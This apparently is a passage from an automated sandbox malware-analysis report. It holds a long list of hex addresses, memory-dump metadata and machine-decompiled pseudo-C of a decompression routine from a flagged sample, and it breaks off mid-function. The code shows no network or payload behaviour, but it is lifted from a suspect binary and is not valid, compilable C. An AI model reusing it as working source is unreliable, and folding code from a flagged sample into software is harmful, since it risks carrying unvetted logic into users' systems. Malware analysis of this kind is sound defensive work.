                                                              0x00000000
                                                              0x00406ff9
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00407286
                                                              0x00407286
                                                              0x0040728a
                                                              0x004075b1
                                                              0x004075b1
                                                              0x00000000
                                                              0x004075b1
                                                              0x00407290
                                                              0x00407290
                                                              0x00407293
                                                              0x00407296
                                                              0x0040729a
                                                              0x0040729d
                                                              0x004072a3
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x00000000
                                                              0x00000000
                                                              0x00407395
                                                              0x00407395
                                                              0x00407399
                                                              0x004073bb
                                                              0x004073bb
                                                              0x004073be
                                                              0x004073c8
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x0040739b
                                                              0x0040739b
                                                              0x0040739e
                                                              0x004073a2
                                                              0x004073a5
                                                              0x004073a5
                                                              0x004073a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407452
                                                              0x00407452
                                                              0x00407456
                                                              0x00407474
                                                              0x00407474
                                                              0x00407474
                                                              0x00407474
                                                              0x0040747b
                                                              0x00407482
                                                              0x00407489
                                                              0x00407489
                                                              0x00407490
                                                              0x00407493
                                                              0x0040749a
                                                              0x00000000
                                                              0x0040749d
                                                              0x00407458
                                                              0x00407458
                                                              0x0040745b
                                                              0x0040745e
                                                              0x00407461
                                                              0x00407468
                                                              0x004073ac
                                                              0x004073ac
                                                              0x004073af
                                                              0x00000000
                                                              0x00000000
                                                              0x00407543
                                                              0x00407543
                                                              0x00407546
                                                              0x00407447
                                                              0x00407447
                                                              0x00407447
                                                              0x00000000
                                                              0x0040744d
                                                              0x00000000
                                                              0x0040717d
                                                              0x0040717d
                                                              0x0040717f
                                                              0x00407186
                                                              0x00407187
                                                              0x00407189
                                                              0x0040718c
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00407490
                                                              0x00407490
                                                              0x00407493
                                                              0x0040749a
                                                              0x00000000
                                                              0x0040749d
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004071c2
                                                              0x004071c2
                                                              0x004071c5
                                                              0x004071fb
                                                              0x004071fb
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732e
                                                              0x0040732e
                                                              0x00407331
                                                              0x00407333
                                                              0x004075bd
                                                              0x004075bd
                                                              0x00000000
                                                              0x004075bd
                                                              0x00407339
                                                              0x00407339
                                                              0x0040733c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407342
                                                              0x00407342
                                                              0x00407346
                                                              0x00407349
                                                              0x00407349
                                                              0x00407349
                                                              0x00000000
                                                              0x00407349
                                                              0x004071c7
                                                              0x004071c7
                                                              0x004071c9
                                                              0x004071cb
                                                              0x004071cd
                                                              0x004071d0
                                                              0x004071d1
                                                              0x004071d3
                                                              0x004071d5
                                                              0x004071d8
                                                              0x004071db
                                                              0x004071f1
                                                              0x004071f1
                                                              0x004071f6
                                                              0x0040722e
                                                              0x0040722e
                                                              0x00407232
                                                              0x0040725b
                                                              0x0040725e
                                                              0x00407260
                                                              0x00407267
                                                              0x0040726a
                                                              0x0040726d
                                                              0x0040726d
                                                              0x00407272
                                                              0x00407272
                                                              0x00407274
                                                              0x00407277
                                                              0x0040727e
                                                              0x00407281
                                                              0x004072ae
                                                              0x004072ae
                                                              0x004072b1
                                                              0x004072b4
                                                              0x00407328
                                                              0x00407328
                                                              0x00407328
                                                              0x00407328
                                                              0x00000000
                                                              0x00407328
                                                              0x004072b6
                                                              0x004072b6
                                                              0x004072bc
                                                              0x004072bf
                                                              0x004072c2
                                                              0x004072c5
                                                              0x004072c8
                                                              0x004072cb
                                                              0x004072ce
                                                              0x004072d1
                                                              0x004072d4
                                                              0x004072d7
                                                              0x004072f0
                                                              0x004072f2
                                                              0x004072f5
                                                              0x004072f6
                                                              0x004072f9
                                                              0x004072fb
                                                              0x004072fe
                                                              0x00407300
                                                              0x00407302
                                                              0x00407305
                                                              0x00407307
                                                              0x0040730a
                                                              0x0040730e
                                                              0x00407310
                                                              0x00407310
                                                              0x00407311
                                                              0x00407314
                                                              0x00407317
                                                              0x004072d9
                                                              0x004072d9
                                                              0x004072e1
                                                              0x004072e6
                                                              0x004072e8
                                                              0x004072eb
                                                              0x004072eb
                                                              0x0040731a
                                                              0x00407321
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x00000000
                                                              0x00407323
                                                              0x00407323
                                                              0x00000000
                                                              0x00407323
                                                              0x00407321
                                                              0x00407234
                                                              0x00407234
                                                              0x00407237
                                                              0x00407239
                                                              0x0040723c
                                                              0x0040723f
                                                              0x00407242
                                                              0x00407244
                                                              0x00407247
                                                              0x0040724a
                                                              0x0040724a
                                                              0x0040724d
                                                              0x0040724d
                                                              0x00407250
                                                              0x00407257
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x00000000
                                                              0x00407259
                                                              0x00407259
                                                              0x00000000
                                                              0x00407259
                                                              0x00407257
                                                              0x004071dd
                                                              0x004071dd
                                                              0x004071e0
                                                              0x004071e2
                                                              0x004071e5
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f44
                                                              0x00406f44
                                                              0x00406f48
                                                              0x0040758d
                                                              0x0040758d
                                                              0x00000000
                                                              0x0040758d
                                                              0x00406f4e
                                                              0x00406f4e
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00406f57
                                                              0x00406f5a
                                                              0x00406f5d
                                                              0x00406f60
                                                              0x00406f62
                                                              0x00406f65
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00000000
                                                              0x00000000
                                                              0x004070cf
                                                              0x004070cf
                                                              0x004070d3
                                                              0x00407599
                                                              0x00407599
                                                              0x00000000
                                                              0x00407599
                                                              0x004070d9
                                                              0x004070d9
                                                              0x004070dc
                                                              0x004070df
                                                              0x004070e2
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e7
                                                              0x004070ea
                                                              0x004070ed
                                                              0x004070f0
                                                              0x004070f3
                                                              0x004070f6
                                                              0x004070f7
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070fc
                                                              0x004070ff
                                                              0x00407102
                                                              0x00407105
                                                              0x00407105
                                                              0x00407105
                                                              0x00407108
                                                              0x0040710a
                                                              0x0040710a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040734c
                                                              0x0040734c
                                                              0x0040734c
                                                              0x00407350
                                                              0x00000000
                                                              0x00000000
                                                              0x00407356
                                                              0x00407356
                                                              0x00407359
                                                              0x0040735c
                                                              0x0040735f
                                                              0x00407361
                                                              0x00407361
                                                              0x00407361
                                                              0x00407364
                                                              0x00407367
                                                              0x0040736a
                                                              0x0040736d
                                                              0x00407370
                                                              0x00407373
                                                              0x00407374
                                                              0x00407376
                                                              0x00407376
                                                              0x00407376
                                                              0x00407379
                                                              0x0040737c
                                                              0x0040737f
                                                              0x00407382
                                                              0x00407385
                                                              0x00407389
                                                              0x0040738b
                                                              0x0040738e
                                                              0x00000000
                                                              0x00407390
                                                              0x00407390
                                                              0x0040710d
                                                              0x0040710d
                                                              0x00000000
                                                              0x0040710d
                                                              0x0040738e
                                                              0x004075c3
                                                              0x004075c3
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x004075fa
                                                              0x004075fa
                                                              0x00000000
                                                              0x004075fa
                                                              0x00407447
                                                              0x004074c7
                                                              0x00407490

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                              • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                              • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                              • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 98%
                                                              			E00407395() {
                                                              				void _t533;
                                                              				signed int _t534;
                                                              				signed int _t535;
                                                              				signed int* _t605;
                                                              				void* _t612;
                                                              
                                                              				L0:
                                                              				while(1) {
                                                              					L0:
                                                              					if( *(_t612 - 0x40) != 0) {
                                                              						 *(_t612 - 0x84) = 0x13;
                                                              						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                              						goto L132;
                                                              					} else {
                                                              						__eax =  *(__ebp - 0x4c);
                                                              						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                              						__ecx =  *(__ebp - 0x58);
                                                              						__eax =  *(__ebp - 0x4c) << 4;
                                                              						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                              						L130:
                                                              						 *(__ebp - 0x58) = __eax;
                                                              						 *(__ebp - 0x40) = 3;
                                                              						L144:
                                                              						 *(__ebp - 0x7c) = 0x14;
                                                              						L145:
                                                              						__eax =  *(__ebp - 0x40);
                                                              						 *(__ebp - 0x50) = 1;
                                                              						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                              						L149:
                                                              						if( *(__ebp - 0x48) <= 0) {
                                                              							__ecx =  *(__ebp - 0x40);
                                                              							__ebx =  *(__ebp - 0x50);
                                                              							0 = 1;
                                                              							__eax = 1 << __cl;
                                                              							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                              							__eax =  *(__ebp - 0x7c);
                                                              							 *(__ebp - 0x44) = __ebx;
                                                              							while(1) {
                                                              								L140:
                                                              								 *(_t612 - 0x88) = _t533;
                                                              								while(1) {
                                                              									L1:
                                                              									_t534 =  *(_t612 - 0x88);
                                                              									if(_t534 > 0x1c) {
                                                              										break;
                                                              									}
                                                              									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                              										case 0:
                                                              											if( *(_t612 - 0x6c) == 0) {
                                                              												goto L170;
                                                              											}
                                                              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                              											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                              											_t534 =  *( *(_t612 - 0x70));
                                                              											if(_t534 > 0xe1) {
                                                              												goto L171;
                                                              											}
                                                              											_t538 = _t534 & 0x000000ff;
                                                              											_push(0x2d);
                                                              											asm("cdq");
                                                              											_pop(_t569);
                                                              											_push(9);
                                                              											_pop(_t570);
                                                              											_t608 = _t538 / _t569;
                                                              											_t540 = _t538 % _t569 & 0x000000ff;
                                                              											asm("cdq");
                                                              											_t603 = _t540 % _t570 & 0x000000ff;
                                                              											 *(_t612 - 0x3c) = _t603;
                                                              											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                              											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                              											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                              											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                              												L10:
                                                              												if(_t611 == 0) {
                                                              													L12:
                                                              													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                              													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                              													goto L15;
                                                              												} else {
                                                              													goto L11;
                                                              												}
                                                              												do {
                                                              													L11:
                                                              													_t611 = _t611 - 1;
                                                              													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                              												} while (_t611 != 0);
                                                              												goto L12;
                                                              											}
                                                              											if( *(_t612 - 4) != 0) {
                                                              												GlobalFree( *(_t612 - 4));
                                                              											}
                                                              											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                              											 *(_t612 - 4) = _t534;
                                                              											if(_t534 == 0) {
                                                              												goto L171;
                                                              											} else {
                                                              												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                              												goto L10;
                                                              											}
                                                              										case 1:
                                                              											L13:
                                                              											__eflags =  *(_t612 - 0x6c);
                                                              											if( *(_t612 - 0x6c) == 0) {
                                                              												 *(_t612 - 0x88) = 1;
                                                              												goto L170;
                                                              											}
                                                              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                              											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                              											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                              											_t45 = _t612 - 0x48;
                                                              											 *_t45 =  *(_t612 - 0x48) + 1;
                                                              											__eflags =  *_t45;
                                                              											L15:
                                                              											if( *(_t612 - 0x48) < 4) {
                                                              												goto L13;
                                                              											}
                                                              											_t546 =  *(_t612 - 0x40);
                                                              											if(_t546 ==  *(_t612 - 0x74)) {
                                                              												L20:
                                                              												 *(_t612 - 0x48) = 5;
                                                              												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                              												goto L23;
                                                              											}
                                                              											 *(_t612 - 0x74) = _t546;
                                                              											if( *(_t612 - 8) != 0) {
                                                              												GlobalFree( *(_t612 - 8));
                                                              											}
                                                              											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                              											 *(_t612 - 8) = _t534;
                                                              											if(_t534 == 0) {
                                                              												goto L171;
                                                              											} else {
                                                              												goto L20;
                                                              											}
                                                              										case 2:
                                                              											L24:
                                                              											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                              											 *(_t612 - 0x84) = 6;
                                                              											 *(_t612 - 0x4c) = _t553;
                                                              											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                              											goto L132;
                                                              										case 3:
                                                              											L21:
                                                              											__eflags =  *(_t612 - 0x6c);
                                                              											if( *(_t612 - 0x6c) == 0) {
                                                              												 *(_t612 - 0x88) = 3;
                                                              												goto L170;
                                                              											}
                                                              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                              											_t67 = _t612 - 0x70;
                                                              											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                              											__eflags =  *_t67;
                                                              											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                              											L23:
                                                              											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                              											if( *(_t612 - 0x48) != 0) {
                                                              												goto L21;
                                                              											}
                                                              											goto L24;
                                                              										case 4:
                                                              											L133:
                                                              											_t531 =  *_t605;
                                                              											_t588 = _t531 & 0x0000ffff;
                                                              											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                              											if( *(_t612 - 0xc) >= _t564) {
                                                              												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                              												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                              												 *(_t612 - 0x40) = 1;
                                                              												_t532 = _t531 - (_t531 >> 5);
                                                              												__eflags = _t532;
                                                              												 *_t605 = _t532;
                                                              											} else {
                                                              												 *(_t612 - 0x10) = _t564;
                                                              												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                              												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                              											}
                                                              											if( *(_t612 - 0x10) >= 0x1000000) {
                                                              												goto L139;
                                                              											} else {
                                                              												goto L137;
                                                              											}
                                                              										case 5:
                                                              											L137:
                                                              											if( *(_t612 - 0x6c) == 0) {
                                                              												 *(_t612 - 0x88) = 5;
                                                              												goto L170;
                                                              											}
                                                              											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                              											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                              											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                              											L139:
                                                              											_t533 =  *(_t612 - 0x84);
                                                              											goto L140;
                                                              										case 6:
                                                              											__edx = 0;
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												__eax =  *(__ebp - 4);
                                                              												__ecx =  *(__ebp - 0x38);
                                                              												 *(__ebp - 0x34) = 1;
                                                              												 *(__ebp - 0x84) = 7;
                                                              												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                              												goto L132;
                                                              											}
                                                              											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                              											__esi =  *(__ebp - 0x60);
                                                              											__cl = 8;
                                                              											__cl = 8 -  *(__ebp - 0x3c);
                                                              											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                              											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                              											__ecx =  *(__ebp - 0x3c);
                                                              											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                              											__ecx =  *(__ebp - 4);
                                                              											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                              											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                              											__eflags =  *(__ebp - 0x38) - 4;
                                                              											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                              											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                              											if( *(__ebp - 0x38) >= 4) {
                                                              												__eflags =  *(__ebp - 0x38) - 0xa;
                                                              												if( *(__ebp - 0x38) >= 0xa) {
                                                              													_t98 = __ebp - 0x38;
                                                              													 *_t98 =  *(__ebp - 0x38) - 6;
                                                              													__eflags =  *_t98;
                                                              												} else {
                                                              													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                              												}
                                                              											} else {
                                                              												 *(__ebp - 0x38) = 0;
                                                              											}
                                                              											__eflags =  *(__ebp - 0x34) - __edx;
                                                              											if( *(__ebp - 0x34) == __edx) {
                                                              												__ebx = 0;
                                                              												__ebx = 1;
                                                              												goto L61;
                                                              											} else {
                                                              												__eax =  *(__ebp - 0x14);
                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                              													__eflags = __eax;
                                                              												}
                                                              												__ecx =  *(__ebp - 8);
                                                              												__ebx = 0;
                                                              												__ebx = 1;
                                                              												__al =  *((intOrPtr*)(__eax + __ecx));
                                                              												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                              												goto L41;
                                                              											}
                                                              										case 7:
                                                              											__eflags =  *(__ebp - 0x40) - 1;
                                                              											if( *(__ebp - 0x40) != 1) {
                                                              												__eax =  *(__ebp - 0x24);
                                                              												 *(__ebp - 0x80) = 0x16;
                                                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                              												__eax =  *(__ebp - 0x28);
                                                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                              												__eax =  *(__ebp - 0x2c);
                                                              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                              												__eax = 0;
                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                              												__al = __al & 0x000000fd;
                                                              												__eax = (__eflags >= 0) - 1 + 0xa;
                                                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                              												__eax =  *(__ebp - 4);
                                                              												__eax =  *(__ebp - 4) + 0x664;
                                                              												__eflags = __eax;
                                                              												 *(__ebp - 0x58) = __eax;
                                                              												goto L69;
                                                              											}
                                                              											__eax =  *(__ebp - 4);
                                                              											__ecx =  *(__ebp - 0x38);
                                                              											 *(__ebp - 0x84) = 8;
                                                              											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                              											goto L132;
                                                              										case 8:
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												__eax =  *(__ebp - 4);
                                                              												__ecx =  *(__ebp - 0x38);
                                                              												 *(__ebp - 0x84) = 0xa;
                                                              												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                              											} else {
                                                              												__eax =  *(__ebp - 0x38);
                                                              												__ecx =  *(__ebp - 4);
                                                              												__eax =  *(__ebp - 0x38) + 0xf;
                                                              												 *(__ebp - 0x84) = 9;
                                                              												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                              												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                              											}
                                                              											goto L132;
                                                              										case 9:
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												goto L90;
                                                              											}
                                                              											__eflags =  *(__ebp - 0x60);
                                                              											if( *(__ebp - 0x60) == 0) {
                                                              												goto L171;
                                                              											}
                                                              											__eax = 0;
                                                              											__eflags =  *(__ebp - 0x38) - 7;
                                                              											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                              											__eflags = _t259;
                                                              											0 | _t259 = _t259 + _t259 + 9;
                                                              											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                              											goto L76;
                                                              										case 0xa:
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												__eax =  *(__ebp - 4);
                                                              												__ecx =  *(__ebp - 0x38);
                                                              												 *(__ebp - 0x84) = 0xb;
                                                              												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                              												goto L132;
                                                              											}
                                                              											__eax =  *(__ebp - 0x28);
                                                              											goto L89;
                                                              										case 0xb:
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												__ecx =  *(__ebp - 0x24);
                                                              												__eax =  *(__ebp - 0x20);
                                                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                              											} else {
                                                              												__eax =  *(__ebp - 0x24);
                                                              											}
                                                              											__ecx =  *(__ebp - 0x28);
                                                              											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                              											L89:
                                                              											__ecx =  *(__ebp - 0x2c);
                                                              											 *(__ebp - 0x2c) = __eax;
                                                              											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                              											L90:
                                                              											__eax =  *(__ebp - 4);
                                                              											 *(__ebp - 0x80) = 0x15;
                                                              											__eax =  *(__ebp - 4) + 0xa68;
                                                              											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                              											goto L69;
                                                              										case 0xc:
                                                              											L100:
                                                              											__eflags =  *(__ebp - 0x6c);
                                                              											if( *(__ebp - 0x6c) == 0) {
                                                              												 *(__ebp - 0x88) = 0xc;
                                                              												goto L170;
                                                              											}
                                                              											__ecx =  *(__ebp - 0x70);
                                                              											__eax =  *(__ebp - 0xc);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											_t335 = __ebp - 0x70;
                                                              											 *_t335 =  *(__ebp - 0x70) + 1;
                                                              											__eflags =  *_t335;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											__eax =  *(__ebp - 0x2c);
                                                              											goto L102;
                                                              										case 0xd:
                                                              											L37:
                                                              											__eflags =  *(__ebp - 0x6c);
                                                              											if( *(__ebp - 0x6c) == 0) {
                                                              												 *(__ebp - 0x88) = 0xd;
                                                              												goto L170;
                                                              											}
                                                              											__ecx =  *(__ebp - 0x70);
                                                              											__eax =  *(__ebp - 0xc);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											_t122 = __ebp - 0x70;
                                                              											 *_t122 =  *(__ebp - 0x70) + 1;
                                                              											__eflags =  *_t122;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											L39:
                                                              											__eax =  *(__ebp - 0x40);
                                                              											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                              												goto L48;
                                                              											}
                                                              											__eflags = __ebx - 0x100;
                                                              											if(__ebx >= 0x100) {
                                                              												goto L54;
                                                              											}
                                                              											L41:
                                                              											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                              											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                              											__ecx =  *(__ebp - 0x58);
                                                              											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                              											 *(__ebp - 0x48) = __eax;
                                                              											__eax = __eax + 1;
                                                              											__eax = __eax << 8;
                                                              											__eax = __eax + __ebx;
                                                              											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              											__ax =  *__esi;
                                                              											 *(__ebp - 0x54) = __esi;
                                                              											__edx = __ax & 0x0000ffff;
                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              												__cx = __ax;
                                                              												 *(__ebp - 0x40) = 1;
                                                              												__cx = __ax >> 5;
                                                              												__eflags = __eax;
                                                              												__ebx = __ebx + __ebx + 1;
                                                              												 *__esi = __ax;
                                                              											} else {
                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                              												 *(__ebp - 0x10) = __ecx;
                                                              												0x800 = 0x800 - __edx;
                                                              												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                              												__ebx = __ebx + __ebx;
                                                              												 *__esi = __cx;
                                                              											}
                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              											 *(__ebp - 0x44) = __ebx;
                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                              												goto L39;
                                                              											} else {
                                                              												goto L37;
                                                              											}
                                                              										case 0xe:
                                                              											L46:
